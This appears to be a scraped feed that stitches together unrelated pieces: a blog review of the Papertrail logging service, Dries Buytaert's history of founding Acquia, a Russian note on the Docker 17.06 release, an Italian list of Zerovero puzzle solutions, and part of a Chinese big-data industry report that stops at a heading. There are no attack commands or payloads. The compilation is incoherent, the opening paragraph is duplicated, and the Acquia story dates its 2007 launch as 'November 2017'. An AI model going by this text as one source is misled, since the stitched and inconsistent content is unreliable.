I stumbled upon Papertrail through a Twitter Ad (hey, those things work sometimes!) and figured that I should take a quick look. Given the amount of work I’ve been doing around compliance management and deployment of distributed systems, this seems like it may be an interesting fit. Luckily, they have a free tier as well […]]> I stumbled upon Papertrail through a Twitter Ad (hey, those things work sometimes!) and figured that I should take a quick look. Given the amount of work I’ve been doing around compliance management and deployment of distributed systems, this seems like it may be an interesting fit. Luckily, they have a free tier as well which means it’s easy to kick the tires on it before diving in with a paid commitment.

The concept seems fairly easy:

The signup process was pretty seamless. I went to the pricing page to see what the plan levels are which also has the Free Plan – Sign Up button nicely planted center of screen:

What I really like about this product is the potential to go by data ingestion rather than endpoints for licensing. Scalability is a concern with pricing for me, so knowing that the amount of aggregate data drives the price was rather comforting to me.

The free tier gets a first month with lots of data followed by a 100 MB per month follow on limit. That’s probably not too difficult to cap out at, so you can easily see that people will be drawn to the 7$ first paid tier which ups the data to 1GB of storage and 1 year of retention. Clearly, at 7 days retention for the free tier, this is meant to just give you a taste and leave you looking for more if the usability is working for you.

First Steps and the User Experience

On completion of the first form, there is a confirmation email. You are also logged in immediately and ready to roll with the simple welcome screen:

Clicking the button to get started brings you to the instruction screen complete with my favorite (read: most despised) method of deploying which is pushing a script into a sudo bash pipe.

There is an option to run each script component which is much more preferred so you can see the details of what is happening.

Once you’ve done the initial setup process, you get a quick response showing you have active events being logged:

Basic logging is one thing for the system, so the next logical step is to up the game a bit and add some application level logging which is done using the remote-rsyslog2 collector. The docs and process to deploy are available inside the Papertrail site as well:

Now that I’ve got both by system and an application (I’ve picked the Apache error log as a source location) working, I’m redirected to see the live results in my Events screen (mildly censored to protect the innocent):

You can highlight some specific events and drill down into the different context views by highlighting and clicking anywhere in the events screen:

Searching the logs is pretty simple with a search bar that uses simple structured search commands to look for content. Searches are able to be saved and stored for reporting and repetitive use.

On the first pass, this looks like a great product and is especially important for you to think about as you look at how to aggregate logs for the purpose of search and retention for security and auditing.

The key will be making sure that you clearly define the firewall and VPC rules to ensure you have access to the remote server at Papertrail and then to make sure that you keep track of the data you need to retain. I’ve literally spent 15 minutes in the app and that was from first click to live viewing of system and application logs. All that and it’s free too.

There is a referral link which you can use here if you want to try it out.

Give it a try if you’re keen and let me know your experiences or other potential products that are freely available that could do the same thing. It’s always good to share our learnings with the community!


          Dries Buytaert: Acquia's first decade: the founding story   

This week marked Acquia's 10th anniversary. In 2007, Jay Batson and I set out to build a software company based on open source and Drupal that we would come to call Acquia. In honor of our tenth anniversary this week, I wanted to share some of the milestones and lessons that have helped shape Acquia into the company it is today. I hope that my record of Acquia's history not only pays homage to our incredible colleagues, customers and partners that have made this journey worthwhile, but that it offers honest insight into the challenges and rewards of building a company from the ground up.

A Red Hat for Drupal

In 2007, I was attending the University of Ghent working on my PhD dissertation. At the same time, Drupal was gaining momentum; I will never forget when MTV called me seeking support for their new Drupal site. I remember being amazed that a brand like MTV, an institution I had grown up with, had selected Drupal for their website. I was determined to make Drupal successful and helped MTV free of charge.

It became clear that for Drupal to grow, it needed a company focused on helping large organizations like MTV be successful with the software. A "Red Hat for Drupal", as it were. I also noticed that other open source projects, such as Linux had benefitted from well-capitalized backers like Red Hat and IBM. While I knew I wanted to start such a company, I had not yet figured out how. I wanted to complete my PhD first before pursuing business. Due to the limited time and resources afforded to a graduate student, Drupal remained a hobby.

Little did I know that at the same time, over 3,000 miles away, Jay Batson was skimming through a WWII Navajo Code Talker Dictionary. Jay was stationed as an Entrepreneur in Residence at North Bridge Venture Partners, a venture capital firm based in Boston. Passionate about open source, Jay realized there was an opportunity to build a company that provided customers with the services necessary to scale and succeed with open source software. We were fortunate that Michael Skok, a Venture Partner at North Bridge and Jay's sponsor, was working closely with Jay to evaluate hundreds of open source software projects. In the end, Jay narrowed his efforts to Drupal and Apache Solr.

If you're curious as to how the Navajo Code Talker Dictionary fits into all of this, it's how Jay stumbled upon the name Acquia. Roughly translating as "to spot or locate", Acquia was the closest concept in the dictionary that reinforced the ideals of information and content that are intrinsic to Drupal (it also didn't hurt that the letter A would rank first in alphabetical listings). Finally, the similarity to the world "Aqua" paid homage to the Drupal Drop; this would eventually provide direction for Acquia's logo.

Breakfast in Sunnyvale

In March of 2007, I flew from Belgium to California to attend Yahoo's Open Source CMS Summit, where I also helped host DrupalCon Sunnyvale. It was at DrupalCon Sunnyvale where Jay first introduced himself to me. He explained that he was interested in building a company that could provide enterprise organizations supplementary services and support for a number of open source projects, including Drupal and Apache Solr. Initially, I was hesitant to meet with Jay. I was focused on getting Drupal 5 released, and I wasn't ready to start a company until I finished my PhD. Eventually I agreed to breakfast.

Over a baguette and jelly, I discovered that there was overlap between Jay's ideas and my desire to start a "RedHat for Drupal". While I wasn't convinced that it made sense to bring Apache Solr into the equation, I liked that Jay believed in open source and that he recognized that open source projects were more likely to make a big impact when they were supported by companies that had strong commercial backing.

We spent the next few months talking about a vision for the business, eliminated Apache Solr from the plan, talked about how we could elevate the Drupal community, and how we would make money. In many ways, finding a business partner is like dating. You have to get to know each other, build trust, and see if there is a match; it's a process that doesn't happen overnight.

On June 25th, 2007, Jay filed the paperwork to incorporate Acquia and officially register the company name. We had no prospective customers, no employees, and no formal product to sell. In the summer of 2007, we received a convertible note from North Bridge. This initial seed investment gave us the capital to create a business plan, travel to pitch to other investors, and hire our first employees. Since meeting Jay in Sunnyvale, I had gotten to know Michael Skok who also became an influential mentor for me.

Wired interview
Jay and me on one of our early fundraising trips to San Francisco.

Throughout this period, I remained hesitant about committing to Acquia as I was devoted to completing my PhD. Eventually, Jay and Michael convinced me to get on board while finishing my PhD, rather than doing things sequentially.

Acquia, my Drupal startup

Soon thereafter, Acquia received a Series A term sheet from North Bridge, with Michael Skok leading the investment. We also selected Sigma Partners and Tim O'Reilly's OATV from all of the interested funds as co-investors with North Bridge; Tim had become both a friend and an advisor to me.

In many ways we were an unusual startup. Acquia itself didn't have a product to sell when we received our Series A funding. We knew our product would likely be support for Drupal, and evolve into an Acquia-equivalent of the RedHat Network. However, neither of those things existed, and we were raising money purely on a PowerPoint deck. North Bridge, Sigma and OATV mostly invested in Jay and I, and the belief that Drupal could become a billion dollar company that would disrupt the web content management market. I'm incredibly thankful for Jay, North Bridge, Sigma and OATV for making a huge bet on me.

Receiving our Series A funding was an incredible vote of confidence in Drupal, but it was also a milestone with lots of mixed emotions. We had raised $7 million, which is not a trivial amount. While I was excited, it was also a big step into the unknown. I was convinced that Acquia would be good for Drupal and open source, but I also understood that this would have a transformative impact on my life. In the end, I felt comfortable making the jump because I found strong mentors to help translate my vision for Drupal into a business plan; Jay and Michael's tenure as entrepreneurs and business builders complimented my technical strength and enabled me to fine-tune my own business building skills.

In November 2017, we officially announced Acquia to the world. We weren't ready but a reporter had caught wind of our stealth startup, and forced us to unveil Acquia's existence to the Drupal community with only 24 hours notice. We scrambled and worked through the night on a blog post. Reactions were mixed, but generally very supportive. I shared in that first post my hopes that Acquia would accomplish two things: (i) form a company that supported me in providing leadership to the Drupal community and achieving my vision for Drupal and (ii) establish a company that would be to Drupal what Ubuntu or RedHat were to Linux.

Acquia com march
An early version of Acquia.com, with our original logo and tagline. March 2008.

The importance of enduring values

It was at an offsite in late 2007 where we determined our corporate values. I'm proud to say that we've held true to those values that were scribbled onto our whiteboard 10 years ago. The leading tenant of our mission was to build a company that would "empower everyone to rapidly assemble killer websites".

Acquia vision

In January 2008, we had six people on staff: Gábor Hojtsy (Principal Acquia engineer, Drupal 6 branch maintainer), Kieran Lal (Acquia product manager, key Drupal contributor), Barry Jaspan (Principal Acquia engineer, Drupal core developer) and Jeff Whatcott (Vice President of Marketing). Because I was still living in Belgium at the time, many of our meetings took place screen-to-screen:

Typical work day

Opening our doors for business

We spent a majority of the first year building our first products. Finally, in September of 2008, we officially opened our doors for business. We publicly announced commercial availability of the Acquia Drupal distribution and the Acquia Network. The Acquia Network would offer subscription-based access to commercial support for all of the modules in Acquia Drupal, our free distribution of Drupal. This first product launched closely mirrored the Red Hat business model by prioritizing enterprise support.

We quickly learned that in order to truly embrace Drupal, customers would need support for far more than just Acquia Drupal. In the first week of January 2009, we relaunched our support offering and announced that we would support all things related to Drupal 6, including all modules and themes available on drupal.org as well as custom code.

This was our first major turning point; supporting "everything Drupal" was a big shift at the time. Selling support for Acquia Drupal exclusively was not appealing to customers, however, we were unsure that we could financially sustain support for every Drupal module. As a startup, you have to be open to modifying and revising your plans, and to failing fast. It was a scary transition, but we knew it was the right thing to do.

Building a new business model for open source

Exiting 2008, we had launched Acquia Drupal, the Acquia Network, and had committed to supporting all things Drupal. While we had generated a respectable pipeline for Acquia Network subscriptions, we were not addressing Drupal's biggest adoption challenges; usability and scalability.

In October of 2008, our team gathered for a strategic offsite. Tom Erickson, who was on our board of directors, facilitated the offsite. Red Hat's operational model, which primarily offered support, had laid the foundation for how companies could monetize open source, but were convinced that the emergence of the cloud gave us a bigger opportunity and helped us address Drupal's adoption challenges. Coming out of that seminal offsite we formalized the ambitious decision to build Drupal Gardens and Acquia Hosting. Here's why these two products were so important:

Solving for scalability: In 2008, scaling Drupal was a challenge for many organizations. Drupal scaled well, but the infrastructure companies required to make Drupal scale well was expensive and hard to find. We determined that the best way to help enterprise companies scale was by shifting the paradigm for web hosting from traditional rack models to the then emerging promise of the "cloud".

Solving for usability: In 2008, CMSs like Wordpress and Ning made it really easy for people to start blogging or to set up a social network. At the time, Drupal didn't encourage this same level of adoption for non-technical audiences. Drupal Gardens was created to offer an easy on-ramp for people to experience the power of Drupal, without worrying about installation, hosting, and upgrading. It was one of the first times we developed an operational model that would offer "Drupal-as-a-service".

Acquia roadmap

Fast forward to today, and Acquia Hosting evolved into Acquia Cloud. Drupal Gardens evolved into Acquia Cloud Site Factory. In 2008, this product roadmap to move Drupal into the cloud was a bold move. Today, the Cloud is the starting point for any modern digital architecture. By adopting the Cloud into our product offering, I believe Acquia helped establish a new business model to commercialize open source. Today, I can't think of many open source companies that don't have a cloud offering.

Tom Erickson takes a chance on Acquia

Tom joined Acquia as an advisor and a member of our Board of Directors when Acquia was founded. Since the first time I met Tom, I always wanted him to be an integral part of Acquia. It took some convincing, but Tom eventually agreed to join us full time as our CEO in 2009. Jay Batson, Acquia's founding CEO, continued on as the Vice President at Acquia responsible for incubating new products and partnerships.

Moving from Europe to the United States

In 2010, after spending my entire life in Antwerp, I decided to move to Boston. The move would allow me to be closer to the team. A majority of the company was in Massachusetts, and at the pace we were growing, it was getting harder to help execute our vision all the way from Belgium. I was also hoping to cut down on travel time; in 2009 flew 100,000 miles in just one year (little did I know that come 2016, I'd be flying 250,00 miles!).

This is a challenge that many entrepreneurs face when they commit to starting their own company. Initially, I was only planning on staying on the East Coast for two years. Moving 3,500 miles away from your home town, most of your relatives, and many of your best friends is not an easy choice. However, it was important to increase our chances of success, and relocating to Boston felt essential. My experience of moving to the US had a big impact on my life.

Building the universal platform for the world's greatest digital experiences

Entering 2010, I remember feeling that Acquia was really 3 startups in one; our support business (Acquia Network, which was very similar to Red Hat's business model), our managed cloud hosting business (Acquia Hosting) and Drupal Gardens (a WordPress.com based on Drupal). Welcoming Tom as our CEO would allow us to best execute on this offering, and moving to Boston enabled me to partner with Tom directly. It was during this transformational time that I think we truly transitioned out of our "founding period" and began to emulate the company I know today.

The decisions we made early in the company's life, have proven to be correct. The world has embraced open source and cloud without reservation, and our long-term commitment to this disruptive combination has put us at the right place at the right time. Acquia has grown into a company with over 800 employees around the world; in total, we have 14 offices around the globe, including our headquarters in Boston. We also support an incredible roster of customers, including 16 of the Fortune 100 companies. Our work continues to be endorsed by industry analysts, as we have emerged as a true leader in our market. Over the past ten years I've had the privilege of watching Acquia grow from a small startup to a company that has crossed the chasm.

With a decade behind us, and many lessons learned, we are on the cusp of yet another big shift that is as important as the decision we made to launch Acquia Field and Gardens in 2008. In 2016, I led the project to update Acquia's mission to "build the universal platform for the world's greatest digital experiences". This means expanding our focus, and becoming the leader in building digital customer experiences. Just like I openly shared our roadmap and strategy in 2009, I plan to share our next 10 year plan in the near future. It's time for Acquia to lay down the ambitious foundation that will enable us to be at the forefront of innovation and digital experience in 2027.

A big thank you

Of course, none of these results and milestones would be possible without the hard work of the Acquia team, our customers, partners, the Drupal community, and our many friends. Thank you for all your hard work. After 10 years, I continue to love the work I do at Acquia each day — and that is because of you.


          Выпуск cистемы управления контейнерной виртуализацией Docker 17.06   
Представлен релиз инструментария для управления изолированными Linux-контейнерами Docker 17.06, предоставляющего высокоуровневый API для манипуляции контейнерами на уровне изоляции отдельных приложений. Docker позволяет, не заботясь о формировании начинки контейнера, запускать произвольные процессы в режиме изоляции и затем переносить и клонировать сформированные для данных процессов контейнеры на другие серверы, беря на себя всю работу по созданию, обслуживанию и сопровождению контейнеров. Инструментарий базируется на применении встроенных в ядро Linux штатных механизмов изоляции на основе пространств имён (namespaces) и групп управления (cgroups). Код Docker написан на языке Go и распространяется под лицензией Apache 2.0.
          Novembre speciale sulla spiaggia e nuovo recapito di Zerovero   

Non so se occorra ringraziare l'anticiclone delle Azzorre,
oppure el niño o semplicemente San Martino.
Assistiamo a ben altro spettacolo de
"la nebbia a gl'irti colli piovigginando sale"

anche sulla spiaggia di Riccione!

Webcam sulla spiaggia di Riccione



Qui appresso continua la lista delle soluzioni di Zerovero, visto che la pagina dedicata
precedente inizia a soffrire di elefantiasi.

23.12.2015 Bandiera gialla e commedia all'italiana portano al finale tra Tacco - DODICI - Apostoli.
Modico numero di accessi: 362 page views con 136 returning visits.

24.12.2015 Catena pre-natalizia facile, termina tra Chiusura - LAMPO - Genio.
Modesto numero di accessi: 229 page views con appena 68 returning visits. Effetto vacanze.

25.12.2015 Catena natalizia in accordo con la soluzione tra Bicicletta - CAMPANELLO - Allarme.

Facilissimo a Natale: solo 252 page views per 101 returning visits.

28.12.2015 Concatenazione scialba per anello finale tra Capelli - SPUNTATA - Pallottola.
Solita difficoltà, soliti arrivi: 366 page views con 140 returning visits.

29.12.2015 Grazie a fuori esercizio e muro del suono. Anello risolutore tra Bilancio - VOCE - Alzare.
Conclusione non così immediata: 502 page views e 173 returning visits.

30.12.2015 Il teatro sociale conduce oggi alla tripletta Biscotti - FORTUNA - Cieca.
Modico numero di accessi: 366 page views con 158 returning visits.

31.12.2015 Grazie ad una nota di colore bruno si perviene all'anello tra Moneta - ORO - Orso.
Discreto, mediocre: come solito, 389 page views con 141 returning visits.

01.01.2016 Catena agevole (aggettivo acceleratore) con finale ingrato tra Acqua - CIOCCOLATO - Tavoletta.
Cioccolato amaro e impegnativo: 597 page views con 203 returning visits.

04.01.2016 Grazie a un'educazione siberiana si perviene alla soluzione tra Caraffa - FILTRANTE - Passaggio.
Discreto numero di accessi: 660 page views con 213 returning visits.

05.01.2016 Senza macchina del tempo non si perviene all'anello tra Senso - ORGANO - Tastiera.
Buon numero di accessi: 689 page views con 242 returning visits.

06.01.2016 Concatenazione senza tranelli per anello tra Monaco - ALBERTO - Lupo.
Senza infamia: 420 page views con 164 returning visits.

07.01.2016 Una ricerca a tappeto conduce alla finale tra Motore - TESTATA - Giornale.
Discreto numero di accessi: 641 page views con 231 returning visits.

08.01.2016 Superando la febbre del Nilo si giunge all'anello tra Sigaretta - CARTINA - Politica.
Discreto numero di visite: 481 page views con 213 returning visits.

11.01.2016 Giocoforza passare sul trionfo di Bacco per arrivare all'anello tra Battaglia - SOMME - Tirare.
Discreto numero di accessi, battaglia difficile: 626 page views con 219 returning visits.

12.01.2016 Disco volante porta alla soluzione odierna tra Presentarsi - SBARRA - Attrezzo.
Conclusione non così immediata: 523 page views e 225 returning visits.

13.01.2016 Gatto-occhi-prosciutto porta alla soluzione tra Orlando - MAGIC - Mike.
Non facile soluzione: 599 page views e 234 returning visits.

14.01.2016 Catene agevoli con anello finale tra Pollo - CESTELLO - Lavatrice.
Soluzione agevole con 472 page view e 174 returning visits.

15.01.2016 Alla fine della fiera, bandiera a scacchi conduce alla soluzione tra Sorelle - SETTE - Porta.
Discreto numero di accessi: 608 page views con 225 returning visits.

18.01.2016 Catena un po' filoticinese che si conclude tra Bicicletta - BELLEZZE - Naturali.
Enigma discreto. Accessi normali: 557 page views e 216 returning visits.

19.01.2016 Soluzione agevole fino alla fine tra Pianta - FUSTO - Benzina.
Conclusione non così immediata: 564 page views e 236 returning visits.

20.01.2016 Catena poco intuitiva con anello finale tra Club - SANDWICH - Isole.
Più che discreto numero di visite: 644 page views, con 239 returning visits.

21.01.2016 Grazie a Bertoli-Pescatore si giunge alla soluzione tra Anello - COMPAGNIA - Bella.
Sembra un abbonamento: 543 page views, con 211 returning visits.

22.01.2016 Stufato d'asino ed asparagi alla milanese propiziano la finale tra Peccato - MORTALE - Comune.
Malgrado la difficoltà, oggi solo 518 page views e 217 returning visits.

25.01.2016 Concatenazione agevole che si conclude tra Sparare - MUCCHIO - Selvaggio.
Soluzione facile con 450 page view e 184 returning visits.

26.01.2016 Passando da piazza della foca si arriva all'anello tra Vento - BAVA - Gnocchi.
Difficile soluzione finale: 868 page views e 257 returning visits.

27.01.2015 Concatenazione rapida e anello finale tra Anima - COLPO - Aria.
Conclusione non così immediata: 686 page views e 259 returning visits.

28.01.2016 Falco a metà propizia la soluzione odierna tra Sud - BENVENUTI - Pugile.
Non facile: 593 page views e 239 returning visits.

29.01.2016 Catena/e facile/i con tripletta finale tra Vena - PORTA - Entrata.
Soluzione agevole con 447 page view e 191 returning visits.

01.02.2016 Il leone di montagna propizia la soluzione conclusiva tra Pura - COINCIDENZA - Treno.
Difficoltà nella norma alta, con 687 page views e 267 returning visits.

02.02.2016 Catena un po' filoticinese (Campo Blenio) che si risolve tra Dente - RADICE - Matematica.
Laboriosa soluzione finale: 805 page views e 300 returning visits.

03.02.2016 Percorso facile e immediato fino all'anello tra Riso - BALDO - Giovane.
Mediamente impegnativo: 607 page views e 245 returning visits.

04.02.2016 Catena ingannevole per anello tra Leventina - SOBRIO - Stile.
Impegnativa, difficile soluzione finale: 802 page views e 275 returning visits.

05.02.2016 Concatenazione classica con soluzione originale tra Sangue - MENTE - Calcolatrice.
Conclusione non così immediata: 635 page views e 249 returning visits.

08.02.2016 Giù di corda la meglio gioventù nel trovare l'anello tra Motore - FOLLE - Parto.
Conclusione non così facile: 585 page views e 234 returning visits.

09.02.2016 Catena senza ambiguità fino all'anello tra Pagare - ROMANA - Lattuga.
Difficoltà nella norma, con 417 page views e 172 returning visits.

10.02.2016 Concatenazione facile per anello finale tra Fifa - SIGLA - Musicale.
Sembra un abbonamento: 601 page views, con 247 returning visits.

11.02.2016 Catena classicheggiante con soluzione tra Legno - SCHEGGIA - Veloce.
Sembra davvero un abbonamento: 608 page views, con 250 returning visits.

12.02.2016 Sì Signore Piano B per anello finale tra Disegno - TECNICO - Commissario.
Conclusione non così immediata: 720 page views e 247 returning visits.

15.02.2016 Quattro posti e uomo nero menano alla soluzione tra Papa - SILVESTRO - Gatto.
Conclusione non facile, al solito: 630 page views e 239 returning visits.

16.02.2016 Neon 10 Maradona Santa consente di arrivare alla soluzione tra Acqua - MATERASSO - Squadra.
Difficoltà nella norma alta, con 701 page views e 253 returning visits.

17.02.2016 Notte Museo e Piccolo Diavolo portano alla soluzione finale tra Prato - FIORITO - Linguaggio.
Difficoltà modeste, con 498 page views e 197 returning visits.

18.02.2016 Mary_Queen_Mercury_Codice risolve tra Onore - PICCHETTO - Tenda.
Senza infamia: al solito, 587 page views con 237 returning visits.

19.02.2016 La Matematica non è un'opinione, ma risolve l'anello finale tra Meccanica - MORSA - Freddo.
Difficoltà mai vista, traffico al massimo con 2171 page views e ben 573 returning visits.

22.02.2016 Catena non facile con soluzione tra Apollo - NAVICELLA - Incenso.
Arzigogolata finale produce 1025 page views e 336 returning visits.

23.02.2016 C'è del marcio in Danimarca porta alla soluzione tra Uovo - POSIZIONE - Guerra.
Impegnativa finale genera 1148 page views e 320 returning visits.

24.02.2016 Cuore di pietra propizia l'anello tra Parata - MAZZIERE - Casinò.
Mostruoso. Picco di traffico al massimo con 2654 page views e ben 690 returning visits.

25.02.2016 Io & Marley conducono alla soluzione tra Artificiali - LACRIME - Scoppiare.
Senza infamia: al solito, 634 page views con 267 returning visits.

26.02.2016 Il fumetto di pesce suggerisce l'anello finale tra Muovere - CRITICHE - Condizioni.
Difficoltà modeste, nella media, con 572 page views e 243 returning visits.

29.02.2016 Cottura al sangue facilita l'introvabile soluzione tra Calciatore - NANI - Giardino.
Difficoltà contenute, quasi nella media, con 527 page views e 257 returning visits.

01.03.2013 Gioco - Mulino spiana la soluzione tra Lavagna - LUMINOSA - Intensità.
Non impegnativo: al solito, 542 page views con 218 returning visits.

02.03.2016 Pianeta Donna prelude all'anello tra Indiano - APACHE - Elicottero.
Difficoltà nella norma, con 532 page views e 223 returning visits.

03.03.2016 Piove di Jovanotti porta all'introvabile anello tra Fedi - PAGGETTO- Taglio.
Difficilino, impegnativo: infatti 1271 page views con 401 returning visits.

04.03.2016 Brenno-Blenio-Voce risolve la catena nuova di pacca con anello tra Fuoco - MEZZOGIORNO - Italia.
Sembra davvero un abbonamento: 670 page views, con 254 returning visits.


Le soluzioni Zerovero prossime sono da ricercarsi in calce al post di sabato 5 marzo 2016.
Vi invito ad aggiornare i vostri bookmark.



          Sr. Software Engineer - ARCOS LLC - Columbus, OH   
Oracle, PostgreSQL, C, C++, Java, J2EE, JBoss, HTML, JSP, JavaScript, Web services, SOAP, XML, ASP, JSP, PHP, MySQL, Linux, XSLT, AJAX, J2ME, J2SE, Apache,...
From ARCOS LLC - Tue, 13 Jun 2017 17:31:59 GMT - View all Columbus, OH jobs
          Unravel Data Adds Native Support for Impala and Kafka   
Unravel Data, the Application Performance Management (APM) platform designed for Big Data, announced that it has integrated support for Cloudera Impala and Apache Kafka into its platform, allowing users to derive the maximum value from those applications. Unravel continues to offer the only full-stack solution that doesn’t just monitor and unify system-level data, but rather tracks, correlates, and interprets performance data across the full-stack in order to optimize, troubleshoot, and analyze from a single pane.
          Bug in the Apache Maven Javadoc Plugin   
none
          Episode 24: But is it Web Scale?   

This week Ben Edmunds calls in from Portland and Phil Sturgeon calls in from THE FUTURE. They are joined by Steve Corona to discuss Scaling PHP.

Most of this conversation centers around Phil and Ben’s horrible facial hair with a few questions thrown Steve’s way to educate us on getting the most out of your LAMP stack. The main takeaways are to stop using Apache and to start using Postgres.

Go buy Steve’s book Scaling PHP if you want to be Web Scale.


          星河融快:2017年全球大数据产业报告之海外篇   

作为该系列的开篇文章,本期我们将从宏观的角度带你观察大数据行业的整体生态结构,对大数据采集、数据的分布式存储与处理,以及在此基础之上的数据分析、可视化和在众多行业中的应用进行概述。其后的每篇文章我们都会挑选大约5个行业的数十家典型公司进行详细介绍,并会对其中一个重点行业进行逻辑的梳理与详细案例的剖析。那么首先我们就来说说大数据技术是如何产生的?


星河融快:2017年全球大数据产业报告之海外篇
第一 大数据的技术基础

早在1980年,著名未来学家托夫勒在其所著的《第三次浪潮》中就热情地将“大数据”称颂为 “第三次浪潮的华彩乐章”,这标志着人们首次对海量数据所能够产生的价值有了初步的了解。

但由于连接方式的局限,长期以来人们对于数据的应用大多以企业内部的商业智能为主,随着互联网、移动互联网的普及,企业终于能够直接与用户产生链接并获得大量的用户行为与消费等数据,大数据产业应用的轮廓才渐渐清晰。

2000年初Google为了实现对大量网页的信息抓取、存储,并完成索引的建立及排序功能,同时又希望降低硬件采购成本而逐渐摸索出了利用普通物理机实现的分布式存储、计算体系。这一技术以MapReduce及GFS而为人所熟知,借此大数据得以分布存储在多个数据库中,并进行大规模并发处理,解决了以往单一计算机存储能力不够,计算时间过长而不具备实用性的问题。

依据2003年底Google所发布的论文,前雅虎工程师开发出了类似的分布式存储计算技术Hadoop,随后围绕Hadoop产生了庞大的生态体系,逐渐使大数据基础架构日臻完善。

Hadoop功能包括从数据采集、存储、分析、转运、再到页面展示,完整涵盖了整个流程。例如HDFS实现了数据的分布式存储,HBase负责实现数据库的功能,Flume执行对数据的收集,Sqoop能够对数据进行转移、治理, MapReduce可以通过算法实现分布式计算,Hive则做数据仓库,Pig做数据流处理,Zookeeper实现了各节点间的反馈收集与负载平衡服务,Ambari能够让管理员了解架构整体的工作运行情况。


星河融快:2017年全球大数据产业报告之海外篇

Hadoop生态技术架构

而随着技术的发展,一些适应独特应用场景的数据库、计算处理等软件也越发丰富,例如非结构化数据库MongoDB就因为其较为强大的条件查询功能以及灵活的数据结构获得了广泛的应用;Spark则将Hadoop中的存储介质替换为闪存,而获得了百倍处理速度的增长,Databricks Cloud就是这一架构下的产品化服务。

除此之外大数据生态中还存在着很多的技术发展路径,其中MPP技术主要还是以关系型数据库为主和Hadoop技术目标类似,都为了将数据切分、独立计算后再汇总。相对于SQL on Hadoop,MPP具有数据优化程度高、计算速度快,擅长被用于进行交叉分析等优点,适合企业进行数据分析使用,但其扩展性相对Hadoop来说较弱,一般在10个节点以上便丧失了计算优势,并且由于非开源架构导致其对特定硬件依赖程度较高。

采用MPP存储模式的代表性公司有Teradata,能够通过进行企业数据分析帮助员工减轻大数据处理的精力消耗与费用成本,使企业能够更加专注于业务运营。在传统数据库公司与意图进入数据库市场的企业服务公司(例如SAP)掀起的收购热潮中,Teradata是目前市场仅存的几家大型独立数据分析公司之一。

第二 大数据的数据来源

2011年麦肯锡发布了一份题为“Big Data: The Next Frontier for Innovation, Competition and Productivity”的报告,里面提到美国拥有1000人以上规模的公司平均存储了超过200T的数据,如果对数据进行价值挖掘将激发很多行业及公司的潜力,这一报告标志了商业领域大数据热潮的开端,也使企业服务软件成为了大数据最初的数据源。

随着存储及计算能力的加强和国内大数据产业的兴起,部分从业者在看到行业巨大前景的同时也意识到了国内数据资源的缺乏,由于民生、电信、交通、电力等具有很高价值的数据都掌握在政府及大型国企中并不开放,如何获取数据源成为了比如何提升数据处理方法更大的问题。

目前国内能够进行脱敏并使用的市场数据的来源主要还是集中在手机、PC等单一渠道与场景中,TalkingData、友盟,以及艾瑞、易观等数据分析及咨询机构很大程度上依赖着这些资源,却也被这些资源所局限。而由于政府数据的敏感性,仅有少数机构能够对接政府数据资源。因此预计随着对数据需求的日益强烈以及数据资源价值被渐渐接受,政府数据资源将会成为数据源的重要组成部分。

而更大范围的数据采集工作将会依托于物联网领域。我们在《即将被281亿个传感器包围,你却还没弄懂物联网技术?》中曾讲到,预计2020年我们将会被281亿个传感器包围,本月27号中国联通也宣布截至目前其物联网联通数量已超过5000万个。可以预见的是,在消费者视角内,未来衣食住行等方方面面都将会配备物联网设备实时采集数据,而采集来的数据将会让商家提供更优质、甚至是定制化的服务,形成双赢。而在工业领域,物联网所采集的大数据也将发挥很大的作用,形成良性循环。


星河融快:2017年全球大数据产业报告之海外篇
同样随着数据样本与采集渠道的丰富,针对数据采集过程、数据转换与传送和数据存储环节的服务也已经有了很大的发展,Informatica及Mulesoft就是多渠道数据的集成与数据治理行业中的代表性企业。 第三 大数据的分析及可视化

在有了足够的存储与计算能力,并获得了大量的数据后,数据分析产业的发展水到渠成。目前通用性的数据分析行业,主要有数据分析、数据分析可视化、大数据检索,以及延伸出的数据服务平台、商业智能分析及大数据预测与咨询这6大类业务。

数据分析的内容将会在第二及第三篇文章中详细介绍,今天仅介绍一下数据分析的整体情况,及未来可能的发展方向。

大数据分析的出现,对企业而言最大的价值就是能够将大量沉淀的用户行为数据、消费数据、企业服务软件中的数据进行整合,并通过对这些数据的分析来优化产品设计、价格的制定和销售方法的提升,同时降低企业内部运转的成本提高运营效率,例如Pentho通过抓取企业服务软件(主要为SAP)中的各类数据并挖掘及分析,最终能够帮助企业节约大量的报表制作时间,并让管理者能够实时看到企业的运行情况。


星河融快:2017年全球大数据产业报告之海外篇
同样对于电信、电力以及交通等专业领域的企业来说,通过收集用户数据,可以分析并预测未来的需求,提前对价格进行实时智能调节,并合理分配负载,从而实现利润的最大化并保证运行的安全。
星河融快:2017年全球大数据产业报告之海外篇
而对舆情数据的分析能够帮助企业及时了解市场情绪,并快速迭代自己的产品与服务,对于金融企业来说也可以快速获知最新动态避免因为信息不对称而暴露于风险中。例如Datameer提供的数据分析引擎就能够实时监测公共消息,检测其语言和传播方式,使用户能够早于媒体报道获得最新资讯,并通过可视化的方式使用户轻松快速上手。

大数据可视化,则是建立在大数据分析之上的,让人们能够更加便捷的理解数据分析结果的手段。大多数提供数据可视化业务的公司都将其作为对数据分析的延伸业务,例如Bottlenose在进行数据分析自动化业务的同时,提供对社交媒体分析的“声纳图”,能够让用户对复杂的关系及逻辑线条一目了然,提升了用户对其数据分析业务的采纳程度。


星河融快:2017年全球大数据产业报告之海外篇
预计随着数据分析手段与方法的不断升级,数据的可视化工作将成为重点方向,将日益复杂化的数据分析结果与人相连接将会面临技术不断的挑战。 第四 大数据的行业应用

大数据技术已经被视为了未来经济生活中的基础设施,这意味着几乎全部行业都能够在大数据分析技术之上获得经济效率的提升。星河研究院此次将大数据应用的研究范围覆盖到了20多个行业,包含电子商务、媒体营销、物流、企业服务、教育、汽车、金融科技等诸多产业,这一部分行业与公司的介绍将会放在第四到第七篇文章中。

在销售行业中,通过输入客户的性格、穿搭习惯、所处行业及历史销售数据等信息,销售员将会被大数据分析告知,何时给哪一位客户打电话获得订单的概率最高;在品牌形象建立中,Persado能够依据市场情绪的分析,写出与用户能够产生共鸣的文案从而获取消费者好感;法律行业中Ravel能够“阅读”过去数十万判决案例,针对用户输入的案件给出判决概率预测,帮助律师制定辩护策略,而长期来看法律大数据企业很有可能取代大部分初级律师;同样在零售、广告、医疗等诸多领域,大数据技术都能通过分析数据内在的关系而帮助用户实现购买预测、受众精准投放以及病情辅助判断等功能。大数据的行业应用精彩纷呈,远不止上文所提到的这些,接下来的文章中我们会逐一展现大数据应用的神奇。

第五 大数据成为AI产业的燃料

